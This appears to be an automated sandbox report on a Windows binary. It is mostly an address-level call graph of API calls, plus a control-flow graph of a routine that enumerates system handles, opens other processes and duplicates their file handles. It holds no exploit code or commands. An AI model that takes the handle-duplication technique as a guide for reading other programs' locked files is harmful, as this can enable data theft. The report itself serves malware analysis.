API calls 39264->39383 39384 438460 39265->39384 39267 409240 39267->39173 39268 4251c4 39267->39268 39396 424f07 39268->39396 39270 4251e4 39271 4251f7 39270->39271 39272 4251e8 39270->39272 39404 4250f8 39271->39404 39403 4446ea 11 API calls 39272->39403 39274 4251f2 39274->39176 39276 425209 39279 425249 39276->39279 39282 4250f8 126 API calls 39276->39282 39283 425287 39276->39283 39412 4384e9 134 API calls 39276->39412 39413 424f74 123 API calls 39276->39413 39279->39283 39414 424ff0 13 API calls 39279->39414 39282->39276 39416 415c7d 16 API calls 39283->39416 39284 425266 39284->39283 39415 415be9 memcpy 39284->39415 39286->39182 39287->39187 39288->39191 39289->39197 39290->39173 39291->39206 39292->39209 39293->39183 39295 443da3 39294->39295 39296 443db6 39294->39296 39417 41707a 11 API calls 39295->39417 39296->39188 39298 443da8 39299 443dbc 39298->39299 39300 443dac 39298->39300 39419 4300e8 memset memset memcpy 39299->39419 39418 4446ea 11 API calls 39300->39418 39303 443dce 39305 443de0 39303->39305 39307 443e22 39303->39307 39304 416935 16 API calls 39304->39296 39305->39304 39306 443e5a 39421 4300e8 memset memset memcpy 39306->39421 39307->39306 39420 41f0ac 102 API calls 39307->39420 39310 443e63 39311 416935 16 API calls 39310->39311 39312 443f3b 39311->39312 39312->39296 39422 42320f memset memcpy 39312->39422 39314->39196 39316 4438d0 39315->39316 39325 4438c9 39315->39325 39317 415378 memcpy memcpy 39316->39317 39318 4438d5 39317->39318 39319 4154e2 10 API calls 39318->39319 39320 443906 39318->39320 39318->39325 39319->39320 39321 443970 memset 39320->39321 39320->39325 39324 44398b 39321->39324 39322 4439a0 39323 415700 10 API calls 39322->39323 39322->39325 39327 4439c0 39323->39327 39324->39322 39326 41975c 10 API calls 39324->39326 39325->39221 39326->39322 39327->39325 39328 418981 10 API calls 39327->39328 39328->39325 39330 415a77 39329->39330 39331 415a8d 39330->39331 39332 415a7e memset 39330->39332 39331->39225 39332->39331 39334 4438b5 11 API calls 39333->39334 39335 41525d 39334->39335 39335->39230 39337 444328 39336->39337 39338 444423 39337->39338 39339 44434e 39337->39339 39341 4446ea 11 API calls 39338->39341 39340 432d4e memset memset memcpy 39339->39340 39342 44435a 39340->39342 39347 444381 39341->39347 39344 444375 39342->39344 39349 44438b 39342->39349 39343 432d4e memset memset memcpy 39345 4443ec 39343->39345 39346 416935 16 API calls 39344->39346 39345->39347 39348 416935 16 API calls 39345->39348 39346->39347 39347->39236 39348->39347 39349->39343 39351 432d65 39350->39351 39352 432d58 39350->39352 39351->39244 39353 432cc4 memset memset memcpy 39352->39353 39353->39351 39355 41eee2 39354->39355 39356 415a6d memset 39355->39356 39357 41ef23 39356->39357 39358 415a6d memset 39357->39358 39367 41ef2d 39357->39367 39371 41693e 39370->39371 39375 41698e 39370->39375 39372 41694c 39371->39372 39373 422fd1 memset 39371->39373 39374 4165a0 11 API calls 39372->39374 39372->39375 39373->39372 39376 416972 39374->39376 39375->39264 39376->39375 39377 422b84 15 API calls 39376->39377 39377->39375 39383->39226 39385 41703f 11 API calls 39384->39385 39386 43847a 39385->39386 39387 43848a 39386->39387 39388 43847e 39386->39388 39390 438270 133 API calls 39387->39390 39389 4446ea 11 API calls 39388->39389 39392 438488 39389->39392 39391 4384aa 39390->39391 39391->39392 39393 424f26 122 API calls 39391->39393 39392->39267 39394 4384bb 39393->39394 39395 438270 133 API calls 39394->39395 39395->39392 39397 424f1f 39396->39397 39398 424f0c 39396->39398 39400 424eea 11 API calls 39397->39400 39399 416760 11 API calls 39398->39399 39401 424f18 39399->39401 39402 424f24 39400->39402 39401->39270 39402->39270 39403->39274 39405 425108 39404->39405 39411 42510d 39404->39411 39406 424f74 123 API calls 39405->39406 39406->39411 39407 42569b 124 API calls 39408 42516e 39407->39408 39410 415c7d 16 API calls 39408->39410 39409 425115 39409->39276 39410->39409 39411->39407 39411->39409 39412->39276 39413->39276 39414->39284 39415->39283 39416->39274 39417->39298 39418->39296 39419->39303 39420->39307 39421->39310 39422->39296 39450 413f4f 39423->39450 39426 413f37 K32GetModuleFileNameExW 39427 413f4a 39426->39427 39427->38567 39429 413969 wcscpy 39428->39429 39430 41396c wcschr 39428->39430 39442 413a3a 39429->39442 39430->39429 39432 41398e 39430->39432 39455 4097f7 wcslen wcslen _memicmp 39432->39455 39434 41399a 39435 4139a4 memset 39434->39435 39436 4139e6 39434->39436 39456 409dd5 GetWindowsDirectoryW wcscpy 39435->39456 39438 413a31 wcscpy 39436->39438 39439 4139ec memset 39436->39439 39438->39442 39457 409dd5 GetWindowsDirectoryW wcscpy 39439->39457 39440 4139c9 wcscpy wcscat 39440->39442 39442->38567 39443 413a11 memcpy wcscat 39443->39442 39445 413cb0 GetModuleHandleW 39444->39445 39446 413cda 39444->39446 39445->39446 39447 413cbf GetProcAddress 39445->39447 39448 413ce3 GetProcessTimes 39446->39448 39449 413cf6 39446->39449 39447->39446 39448->38569 39449->38569 39451 413f2f 39450->39451 39452 413f54 39450->39452 39451->39426 39451->39427 39453 40a804 8 API calls 39452->39453 39454 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39453->39454 39454->39451 39455->39434 39456->39440 39457->39443 39458->38589 39459->38613 39461 409cf9 GetVersionExW 39460->39461 39462 409d0a 39460->39462 39461->39462 39462->38619 39462->38622 39463->38626 39464->38628 39465->38695 39467 40bba5 39466->39467 39514 40cc26 39467->39514 39470 40bd4b 39535 40cc0c 39470->39535 39475 40b2cc 27 API calls 39476 40bbef 39475->39476 39542 40ccf0 _wcsicmp 39476->39542 39478 40bbf5 39478->39470 39543 40ccb4 6 API calls 39478->39543 39480 40bc26 39481 40cf04 17 API calls 39480->39481 39482 40bc2e 39481->39482 39483 40bd43 39482->39483 39484 40b2cc 27 API calls 39482->39484 39485 40cc0c 4 API calls 39483->39485 39486 40bc40 39484->39486 39485->39470 39544 40ccf0 _wcsicmp 39486->39544 39488 40bc46 39488->39483 39489 40bc61 memset memset WideCharToMultiByte 39488->39489 39545 40103c strlen 39489->39545 39491 40bcc0 39492 40b273 27 API calls 39491->39492 39493 40bcd0 memcmp 39492->39493 39493->39483 39494 40bce2 39493->39494 39495 404423 37 API calls 39494->39495 39496 40bd10 39495->39496 39496->39483 39497 40bd3a LocalFree 39496->39497 39498 40bd1f memcpy 39496->39498 39497->39483 39498->39497 39499->38709 39501 409a74 GetTempFileNameW 39500->39501 39502 409a66 GetWindowsDirectoryW 39500->39502 39501->38708 39502->39501 39503->38743 39504->38743 39505->38743 39506->38743 39507->38743 39508->38743 39509->38743 39510->38743 39511->38743 39512->38719 39513->38740 39546 4096c3 CreateFileW 39514->39546 39516 40cc34 39517 40cc3d GetFileSize 39516->39517 39525 40bbca 39516->39525 39518 40afcf 2 API calls 39517->39518 39519 40cc64 39518->39519 39547 40a2ef ReadFile 39519->39547 39521 40cc71 39548 40ab4a MultiByteToWideChar 39521->39548 39523 40cc95 CloseHandle 39524 40b04b ??3@YAXPAX 39523->39524 39524->39525 39525->39470 39526 40cf04 39525->39526 39527 40b633 free 39526->39527 39528 40cf14 39527->39528 39554 40b1ab free free 39528->39554 39530 40bbdd 39530->39470 39530->39475 39531 40cf1b 39531->39530 39533 40cfef 39531->39533 39555 40cd4b 39531->39555 39534 40cd4b 14 API calls 39533->39534 39534->39530 39536 40b633 free 39535->39536 39537 40cc15 39536->39537 39538 40aa04 free 39537->39538 39539 40cc1d 39538->39539 39601 40b1ab free free 39539->39601 39541 40b7d4 memset CreateFileW 39541->38701 39541->38702 39542->39478 39543->39480 39544->39488 39545->39491 39546->39516 39547->39521 39549 40ab93 39548->39549 39550 40ab6b 39548->39550 39549->39523 39551 40a9ce 4 API calls 39550->39551 39552 40ab74 39551->39552 39553 40ab7c MultiByteToWideChar 39552->39553 39553->39549 39554->39531 39556 40cd7b 39555->39556 39589 40aa29 6 API calls 39556->39589 39558 40cef5 39559 40aa04 free 39558->39559 39560 40cefd 39559->39560 39560->39531 39561 40cd89 39561->39558 39590 40aa29 6 API calls 39561->39590 39563 40ce1d 39591 40aa29 6 API calls 39563->39591 39565 40ce3e 39566 40ce6a 39565->39566 39592 40abb7 wcslen memmove 39565->39592 39567 40ce9f 39566->39567 39595 40abb7 wcslen memmove 39566->39595 39598 40a8d0 7 API calls 39567->39598 39571 40ce56 39593 40aa71 wcslen 39571->39593 39572 40ce8b 39596 40aa71 wcslen 39572->39596 39573 40ceb5 39599 40a8d0 7 API calls 39573->39599 39576 40ce5e 39594 40abb7 wcslen memmove 39576->39594 39577 40ce93 39597 40abb7 wcslen memmove 39577->39597 39581 40cecb 39600 40d00b malloc memcpy free free 39581->39600 39583 40cedd 39584 40aa04 free 39583->39584 39585 40cee5 39584->39585 39586 40aa04 free 39585->39586 39587 40ceed 39586->39587 39588 40aa04 free 39587->39588 39588->39558 39589->39561 39590->39563 39591->39565 39592->39571 39593->39576 39594->39566 39595->39572 39596->39577 39597->39567 39598->39573 39599->39581 39600->39583 39601->39541 39602->38759 39603->38767 37544 44dea5 37545 44deb5 FreeLibrary 37544->37545 37546 44dec3 37544->37546 37545->37546 39613 4148b6 FindResourceW 39614 4148cf SizeofResource 39613->39614 39617 4148f9 39613->39617 39615 4148e0 LoadResource 39614->39615 39614->39617 39616 4148ee LockResource 39615->39616 39615->39617 39616->39617 37720 415304 free 39618 441b3f 39628 43a9f6 39618->39628 39620 441b61 39801 4386af memset 39620->39801 39622 44189a 39623 442bd4 39622->39623 39624 4418e2 39622->39624 39625 4418ea 39623->39625 39803 441409 memset 39623->39803 39624->39625 39802 4414a9 12 API calls 39624->39802 39629 43aa20 39628->39629 39630 43aadf 39628->39630 39629->39630 39631 43aa34 memset 39629->39631 39630->39620 39632 43aa56 39631->39632 39633 43aa4d 39631->39633 39804 43a6e7 39632->39804 39812 42c02e memset 39633->39812 39638 43aad3 39814 4169a7 11 API calls 39638->39814 39639 43aaae 39639->39630 39639->39638 39654 43aae5 39639->39654 39640 43ac18 39643 43ac47 39640->39643 39816 42bbd5 memcpy memcpy memcpy memset memcpy 39640->39816 39644 43aca8 39643->39644 39817 438eed 16 API calls 39643->39817 39648 43acd5 39644->39648 39819 4233ae 11 API calls 39644->39819 39647 43ac87 39818 4233c5 16 API calls 39647->39818 39820 423426 11 API calls 39648->39820 39652 43ace1 39821 439811 162 API calls 39652->39821 39653 43a9f6 160 API calls 39653->39654 39654->39630 39654->39640 39654->39653 39815 439bbb 22 API calls 39654->39815 39656 43acfd 39661 43ad2c 39656->39661 39822 438eed 16 API calls 39656->39822 39658 43ad19 39823 4233c5 16 API calls 39658->39823 39660 43ad58 39824 44081d 162 API calls 39660->39824 39661->39660 39664 43add9 39661->39664 39828 423426 11 API calls 39664->39828 39665 43ae3a memset 39666 43ae73 39665->39666 39829 42e1c0 146 API calls 39666->39829 39667 43adab 39826 438c4e 162 API calls 39667->39826 39668 43ad6c 39668->39630 39668->39667 39825 42370b memset memcpy memset 39668->39825 39672 43adcc 39827 440f84 12 API calls 39672->39827 39673 43ae96 39830 42e1c0 146 API calls 39673->39830 39676 43aea8 39677 43aec1 39676->39677 39831 42e199 146 API calls 39676->39831 39678 43af00 39677->39678 39832 42e1c0 146 API calls 39677->39832 39678->39630 39682 43af1a 39678->39682 39683 43b3d9 39678->39683 39833 438eed 16 API calls 39682->39833 39688 43b3f6 39683->39688 39692 43b4c8 39683->39692 39684 43b60f 39684->39630 39892 4393a5 17 API calls 39684->39892 39687 43af2f 39834 4233c5 16 API calls 39687->39834 39874 432878 12 API calls 39688->39874 39690 43af51 39835 423426 11 API calls 39690->39835 39698 43b4f2 39692->39698 39880 42bbd5 memcpy memcpy memcpy memset memcpy 39692->39880 39694 43af7d 39836 423426 11 API calls 39694->39836 39881 43a76c 21 API calls 39698->39881 39699 43b529 39882 44081d 162 API calls 39699->39882 39700 43b462 39876 423330 11 API calls 39700->39876 39701 43af94 39837 423330 11 API calls 39701->39837 39705 43afca 39838 423330 11 API calls 39705->39838 39706 43b47e 39710 43b497 39706->39710 39877 42374a memcpy memset memcpy memcpy memcpy 39706->39877 39707 43b544 39711 43b55c 39707->39711 39883 42c02e memset 39707->39883 39708 43b428 39708->39700 39875 432b60 16 API calls 39708->39875 39878 4233ae 11 API calls 39710->39878 39884 43a87a 162 API calls 39711->39884 39713 43afdb 39839 4233ae 11 API calls 39713->39839 39718 43b56c 39722 43b58a 39718->39722 39885 423330 11 API calls 39718->39885 39719 43b4b1 39879 423399 11 API calls 39719->39879 39721 43afee 39840 44081d 162 API calls 39721->39840 39886 440f84 12 API calls 39722->39886 39723 43b4c1 39888 42db80 162 API calls 39723->39888 39728 43b592 39887 43a82f 16 API calls 39728->39887 39731 43b5b4 39889 438c4e 162 API calls 39731->39889 39733 43b5cf 39890 42c02e memset 39733->39890 39735 43b005 39735->39630 39739 43b01f 39735->39739 39841 42d836 162 API calls 39735->39841 39736 43b1ef 39851 4233c5 16 API calls 39736->39851 39739->39736 39849 423330 11 API calls 39739->39849 39850 42d71d 162 API calls 39739->39850 39740 43b212 39852 423330 11 API calls 39740->39852 39742 43b087 39842 4233ae 11 API calls 39742->39842 39743 43add4 39743->39684 39891 438f86 16 API calls 39743->39891 39746 43b22a 39853 42ccb5 11 API calls 39746->39853 39749 43b23f 39854 4233ae 11 API calls 39749->39854 39750 43b10f 39845 423330 11 API calls 39750->39845 39752 43b257 39855 4233ae 11 API calls 39752->39855 39756 43b129 39846 4233ae 11 API calls 39756->39846 39757 43b26e 39856 4233ae 11 API calls 39757->39856 39760 43b09a 39760->39750 39843 42cc15 19 API calls 39760->39843 39844 4233ae 11 API calls 39760->39844 39761 43b282 39857 43a87a 162 API calls 39761->39857 39763 43b13c 39847 440f84 12 API calls 39763->39847 39765 43b29d 39858 423330 11 API calls 39765->39858 39768 43b15f 39848 4233ae 11 API calls 39768->39848 39769 43b2af 39770 43b2b8 39769->39770 39771 43b2ce 39769->39771 39859 4233ae 11 API calls 39770->39859 39860 440f84 12 API calls 39771->39860 39775 43b2c9 39862 4233ae 11 API calls 39775->39862 39776 43b2da 39861 42370b memset memcpy memset 39776->39861 39779 43b2f9 39863 423330 11 API calls 39779->39863 39781 43b30b 39864 423330 11 API calls 39781->39864 39783 43b325 39865 423399 11 API calls 39783->39865 39785 43b332 39866 4233ae 11 API calls 39785->39866 39787 43b354 39867 423399 11 API calls 39787->39867 39789 43b364 39868 43a82f 16 API calls 39789->39868 39791 43b370 39869 42db80 162 API calls 39791->39869 39793 43b380 39870 438c4e 162 API calls 39793->39870 39795 43b39e 39871 423399 11 API calls 39795->39871 39797 43b3ae 39872 43a76c 21 API calls 39797->39872 39799 43b3c3 39873 423399 11 API calls 39799->39873 39801->39622 39802->39625 39803->39623 39805 43a6f5 39804->39805 39806 43a765 39804->39806 39805->39806 39893 42a115 39805->39893 39806->39630 39813 4397fd memset 39806->39813 39810 43a73d 39810->39806 39811 42a115 146 API calls 39810->39811 39811->39806 39812->39632 39813->39639 39814->39630 39815->39654 39816->39643 39817->39647 39818->39644 39819->39648 39820->39652 39821->39656 39822->39658 39823->39661 39824->39668 39825->39667 39826->39672 39827->39743 39828->39665 39829->39673 39830->39676 39831->39677 39832->39677 39833->39687 39834->39690 39835->39694 39836->39701 39837->39705 39838->39713 39839->39721 39840->39735 39841->39742 39842->39760 39843->39760 39844->39760 39845->39756 39846->39763 39847->39768 39848->39739 39849->39739 39850->39739 39851->39740 39852->39746 39853->39749 39854->39752 39855->39757 39856->39761 39857->39765 39858->39769 39859->39775 39860->39776 39861->39775 39862->39779 39863->39781 39864->39783 39865->39785 39866->39787 39867->39789 39868->39791 39869->39793 39870->39795 39871->39797 39872->39799 39873->39743 39874->39708 39875->39700 39876->39706 39877->39710 39878->39719 39879->39723 39880->39698 39881->39699 39882->39707 39883->39711 39884->39718 39885->39722 39886->39728 39887->39723 39888->39731 39889->39733 39890->39743 39891->39684 39892->39630 39894 42a175 39893->39894 39896 42a122 39893->39896 39894->39806 39899 42b13b 146 API calls 39894->39899 39896->39894 39897 42a115 146 API calls 39896->39897 39900 43a174 39896->39900 39924 42a0a8 146 API calls 39896->39924 39897->39896 39899->39810 39914 43a196 39900->39914 39915 43a19e 39900->39915 39901 43a306 39901->39914 39944 4388c4 14 API calls 39901->39944 39904 42a115 146 API calls 39904->39915 39906 43a642 39906->39914 39948 4169a7 11 API calls 39906->39948 39910 43a635 39947 42c02e memset 39910->39947 39914->39896 39915->39901 39915->39904 39915->39914 39925 42ff8c 39915->39925 39933 415a91 39915->39933 39937 4165ff 39915->39937 39940 439504 13 API calls 39915->39940 39941 4312d0 146 API calls 39915->39941 39942 42be4c memcpy memcpy memcpy memset memcpy 39915->39942 39943 43a121 11 API calls 39915->39943 39917 42bf4c 14 API calls 39919 43a325 39917->39919 39918 4169a7 11 API calls 39918->39919 39919->39906 39919->39910 39919->39914 39919->39917 39919->39918 39920 42b5b5 memset memcpy 39919->39920 39923 4165ff 11 API calls 39919->39923 39945 42b63e 14 API calls 39919->39945 39946 42bfcf memcpy 39919->39946 39920->39919 39923->39919 39924->39896 39949 43817e 39925->39949 39927 42ff9d 39927->39915 39928 42ff99 39928->39927 39929 42ffe3 39928->39929 39930 42ffd0 39928->39930 39954 4169a7 11 API calls 39929->39954 39953 4169a7 11 API calls 39930->39953 39934 415a9d 39933->39934 39935 415ab3 39934->39935 39936 415aa4 memset 39934->39936 39935->39915 39936->39935 40105 4165a0 39937->40105 39940->39915 39941->39915 39942->39915 39943->39915 39944->39919 39945->39919 39946->39919 39947->39906 39948->39914 39950 438187 39949->39950 39952 438192 39949->39952 39955 4380f6 39950->39955 39952->39928 39953->39927 39954->39927 39957 43811f 39955->39957 39956 438164 39956->39952 39957->39956 39960 437e5e 39957->39960 39983 4300e8 memset memset memcpy 39957->39983 39984 437d3c 39960->39984 39962 437eb3 39962->39957 39963 437ea9 39963->39962 39968 437f22 39963->39968 39999 41f432 39963->39999 39966 437f06 40046 415c56 11 API calls 39966->40046 39970 437f7f 39968->39970 39971 432d4e 3 API calls 39968->39971 39969 437f95 40047 415c56 11 API calls 39969->40047 39970->39969 39972 43802b 39970->39972 39971->39970 39975 4165ff 11 API calls 39972->39975 39974 437fa3 39974->39962 40050 41f638 103 API calls 39974->40050 39976 438054 39975->39976 40010 437371 39976->40010 39979 43806b 39980 438094 39979->39980 40048 42f50e 137 API calls 39979->40048 39980->39974 40049 4300e8 memset memset memcpy 39980->40049 39983->39957 39985 437d69 39984->39985 39988 437d80 39984->39988 40051 437ccb 11 API calls 39985->40051 39987 437d76 39987->39963 39988->39987 39989 437da3 39988->39989 39990 437d90 39988->39990 39992 438460 133 API calls 39989->39992 39990->39987 40055 437ccb 11 API calls 39990->40055 39995 437dcb 39992->39995 39993 437de8 40054 424f26 122 API calls 39993->40054 39995->39993 40052 444283 13 API calls 39995->40052 39997 437dfc 40053 437ccb 11 API calls 39997->40053 40000 41f44f 39999->40000 40001 41f54d 39999->40001 40002 41f466 40000->40002 40008 41f50b 40000->40008 40056 41f1a5 40000->40056 40081 41c06f memcmp 40000->40081 40082 41f3b1 89 API calls 40000->40082 40083 41f398 85 API calls 40000->40083 40001->40002 40085 41c635 memset memset 40001->40085 40002->39966 40002->39968 40008->40001 40008->40002 40084 41c295 85 API calls 40008->40084 40086 41703f 40010->40086 40012 437399 40013 43739d 40012->40013 40015 4373ac 40012->40015 40093 4446ea 11 API calls 40013->40093 40016 416935 16 API calls 40015->40016 40032 4373ca 40016->40032 40017 437584 40019 4375bc 40017->40019 40100 42453e 122 API calls 40017->40100 40018 438460 133 API calls 40018->40032 40101 415c7d 16 API calls 40019->40101 40022 4375d2 40026 4373a7 40022->40026 40102 4442e6 11 API calls 40022->40102 40023 4251c4 136 API calls 40023->40032 40025 4375e2 40025->40026 40103 444283 13 API calls 40025->40103 40026->39979 40028 415a91 memset 40028->40032 40031 43758f 40099 42453e 122 API calls 40031->40099 40032->40017 40032->40018 40032->40023 40032->40028 40032->40031 40045 437d3c 134 API calls 40032->40045 40094 425433 13 API calls 40032->40094 40095 425413 17 API calls 40032->40095 40096 42533e 16 API calls 40032->40096 40097 42538f 16 API calls 40032->40097 40098 42453e 122 API calls 40032->40098 40035 4375f4 40038 437620 40035->40038 40039 43760b 40035->40039 40037 43759f 40040 416935 16 API calls 40037->40040 40042 416935 16 API calls 40038->40042 40104 444283 13 API calls 40039->40104 40040->40017 40042->40026 40044 437612 memcpy 40044->40026 40045->40032 40046->39962 40047->39974 40048->39980 40049->39974 40050->39962 40051->39987 40052->39997 40053->39993 40054->39987 40055->39987 40057 41bc3b 100 API calls 40056->40057 40058 41f1b4 40057->40058 40059 41edad 85 API calls 40058->40059 40066 41f282 40058->40066 40060 41f1cb 40059->40060 40061 41f1f5 memcmp 40060->40061 40062 41f20e 40060->40062 40060->40066 40061->40062 40063 41f21b memcmp 40062->40063 40062->40066 40064 41f326 40063->40064 40067 41f23d 40063->40067 40065 41ee6b 85 API calls 40064->40065 40064->40066 40065->40066 40066->40000 40067->40064 40068 41f28e memcmp 40067->40068 40070 41c8df 55 API calls 40067->40070 40068->40064 40069 41f2a9 40068->40069 40069->40064 40072 41f308 40069->40072 40073 41f2d8 40069->40073 40071 41f269 40070->40071 40071->40064 40074 41f287 40071->40074 40075 41f27a 40071->40075 40072->40064 40079 4446ce 11 API calls 40072->40079 40076 41ee6b 85 API calls 40073->40076 40074->40068 40077 41ee6b 85 API calls 40075->40077 40078 41f2e0 40076->40078 40077->40066 40080 41b1ca memset 40078->40080 40079->40064 40080->40066 40081->40000 40082->40000 40083->40000 40084->40001 40085->40002 40087 417044 40086->40087 40088 41705c 40086->40088 40090 416760 11 API calls 40087->40090 40092 417055 40087->40092 40089 417075 40088->40089 40091 41707a 11 API calls 40088->40091 40089->40012 40090->40092 40091->40087 40092->40012 40093->40026 40094->40032 40095->40032 40096->40032 40097->40032 40098->40032 40099->40037 40100->40019 40101->40022 40102->40025 40103->40035 40104->40044 40110 415cfe 40105->40110 40115 415d23 __aullrem __aulldvrm 40110->40115 40117 41628e 40110->40117 40111 4163ca 40124 416422 11 API calls 40111->40124 40113 416172 memset 40113->40115 40114 416422 10 API calls 40114->40115 40115->40111 40115->40113 40115->40114 40116 415cb9 10 API calls 40115->40116 40115->40117 40116->40115 40118 416520 40117->40118 40119 416527 40118->40119 40123 416574 40118->40123 40121 416544 40119->40121 40119->40123 40125 4156aa 11 API calls 40119->40125 40122 416561 memcpy 40121->40122 40121->40123 40122->40123 40123->39915 40124->40117 40125->40121 40147 41493c EnumResourceNamesW 37548 4287c1 37549 4287d2 37548->37549 37550 429ac1 37548->37550 37551 428818 37549->37551 37552 42881f 37549->37552 37567 425711 37549->37567 37562 425ad6 37550->37562 37618 415c56 11 API calls 37550->37618 37585 42013a 37551->37585 37613 420244 96 API calls 37552->37613 37557 4260dd 37612 424251 119 API calls 37557->37612 37559 4259da 37611 416760 11 API calls 37559->37611 37563 429a4d 37568 429a66 37563->37568 37569 429a9b 37563->37569 37566 422aeb memset memcpy memcpy 37566->37567 37567->37550 37567->37559 37567->37563 37567->37566 37573 4260a1 37567->37573 37581 4259c2 37567->37581 37584 425a38 37567->37584 37601 4227f0 memset memcpy 37567->37601 37602 422b84 15 API calls 37567->37602 37603 422b5d memset memcpy memcpy 37567->37603 37604 422640 13 API calls 37567->37604 37606 4241fc 11 API calls 37567->37606 37607 42413a 89 API calls 37567->37607 37614 415c56 11 API calls 37568->37614 37572 429a96 37569->37572 37616 416760 11 API calls 37569->37616 37617 424251 119 API calls 37572->37617 37610 415c56 11 API calls 37573->37610 37575 429a7a 37615 416760 11 API calls 37575->37615 37581->37562 37605 415c56 11 API calls 37581->37605 37584->37581 37608 422640 13 API calls 37584->37608 37609 4226e0 12 API calls 37584->37609 37586 42014c 37585->37586 37589 420151 37585->37589 37628 41e466 96 API calls 37586->37628 37588 420162 37588->37567 37589->37588 37590 4201b3 37589->37590 37591 420229 37589->37591 37592 4201b8 37590->37592 37593 4201dc 37590->37593 37591->37588 37594 41fd5e 85 API calls 37591->37594 37619 41fbdb 37592->37619 37593->37588 37598 4201ff 37593->37598 37625 41fc4c 37593->37625 37594->37588 37598->37588 37600 42013a 96 API calls 37598->37600 37600->37588 37601->37567 37602->37567 37603->37567 37604->37567 37605->37559 37606->37567 37607->37567 37608->37584 37609->37584 37610->37559 37611->37557 37612->37562 37613->37567 37614->37575 37615->37572 37616->37572 37617->37550 37618->37559 37620 41fbf1 37619->37620 37621 41fbf8 37619->37621 37624 41fc39 37620->37624 37643 4446ce 11 API calls 37620->37643 37633 41ee26 37621->37633 37624->37588 37629 41fd5e 37624->37629 37626 41ee6b 85 API calls 37625->37626 37627 41fc5d 37626->37627 37627->37593 37628->37589 37632 41fd65 37629->37632 37630 41fdab 37630->37588 37631 41fbdb 85 API calls 37631->37632 37632->37630 37632->37631 37634 41ee41 37633->37634 37635 41ee32 37633->37635 37644 41edad 37634->37644 37647 4446ce 11 API calls 37635->37647 37639 41ee3c 37639->37620 37641 41ee58 37641->37639 37649 41ee6b 37641->37649 37643->37624 37653 41be52 37644->37653 37647->37639 37648 41eb85 11 API calls 37648->37641 37650 41ee70 37649->37650 37651 41ee78 37649->37651 37706 41bf99 85 API calls 37650->37706 37651->37639 37654 41be6f 37653->37654 37655 41be5f 37653->37655 37660 41be8c 37654->37660 37685 418c63 memset memset 37654->37685 37684 4446ce 11 API calls 37655->37684 37657 41be69 37657->37639 37657->37648 37660->37657 37661 41bf3a 37660->37661 37662 41bed1 37660->37662 37664 41bee7 37660->37664 37688 4446ce 11 API calls 37661->37688 37665 41bef0 37662->37665 37668 41bee2 37662->37668 37664->37657 37689 41a453 85 API calls 37664->37689 37665->37664 37667 41bf01 37665->37667 37666 41bf24 memset 37666->37657 37667->37666 37670 41bf14 37667->37670 37686 418a6d memset memcpy memset 37667->37686 37674 41ac13 37668->37674 37687 41a223 memset memcpy memset 37670->37687 37673 41bf20 37673->37666 37675 41ac52 37674->37675 37676 41ac3f memset 37674->37676 37678 41ac6a 37675->37678 37690 41dc14 19 API calls 37675->37690 37681 41acd9 37676->37681 37680 41aca1 37678->37680 37691 41519d 37678->37691 37680->37681 37682 41acc0 memset 37680->37682 37683 41accd memcpy 37680->37683 37681->37664 37682->37681 37683->37681 37684->37657 37685->37660 37686->37670 37687->37673 37688->37664 37690->37678 37694 4175ed 37691->37694 37702 417570 SetFilePointer 37694->37702 37697 41760a ReadFile 37698 417637 37697->37698 37699 417627 GetLastError 37697->37699 37700 4151b3 37698->37700 37701 41763e memset 37698->37701 37699->37700 37700->37680 37701->37700 37703 4175b2 37702->37703 37704 41759c GetLastError 37702->37704 37703->37697 37703->37700 37704->37703 37705 4175a8 GetLastError 37704->37705 37705->37703 37706->37651 37707 417bc5 37708 417c61 37707->37708 37709 417bda 37707->37709 37709->37708 37710 417bf6 UnmapViewOfFile CloseHandle 37709->37710 37712 417c2c 37709->37712 37714 4175b7 37709->37714 37710->37709 37710->37710 37712->37709 37719 41851e 18 API calls 37712->37719 37715 4175d6 CloseHandle 37714->37715 37716 4175c8 37715->37716 37717 4175df 37715->37717 37716->37717 37718 4175ce Sleep 37716->37718 37717->37709 37718->37715 37719->37712 39604 4147f3 39607 414561 39604->39607 39606 414813 39608 41456d 39607->39608 39609 41457f GetPrivateProfileIntW 39607->39609 39612 4143f1 memset _itow WritePrivateProfileStringW 39608->39612 39609->39606 39611 41457a 39611->39606 39612->39611

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 354->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 375 40dffd-40e006 372->375 376 40df08 373->376 377 40dfef-40dff2 CloseHandle 373->377 374->370 374->375 375->362 375->363 378 40df0b-40df10 376->378 377->372 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040DDAD
                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
